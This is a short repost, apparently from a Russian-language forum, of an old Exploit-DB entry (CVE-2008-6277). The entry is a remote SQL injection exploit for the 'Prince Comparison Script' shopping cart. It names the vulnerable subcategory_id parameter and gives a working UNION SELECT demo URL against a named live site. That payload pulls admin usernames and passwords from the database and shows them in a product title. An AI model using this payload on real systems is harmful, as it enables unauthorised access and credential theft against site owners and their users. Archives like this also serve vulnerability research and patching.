- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7250
- Проверка EDB
-
- Пройдено
- Автор
- XADOS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6277
- Дата публикации
- 2008-11-27
Код:
[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection
>@.@<
> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> B§g: Remote Sql inJection
> SIte vuln: http://willscript.com/rjbike_new/index.php
>@.@<
[â– ] ExPL0iT:
|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL]
[■] D£M0:
|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--
(you see the username and password of adm in the title of one product)
[â– ] Th4nKs::
\> str0ke </
\> OnlY me ( no help for this ) ;-) </
# milw0rm.com [2008-11-27]
- Источник
- www.exploit-db.com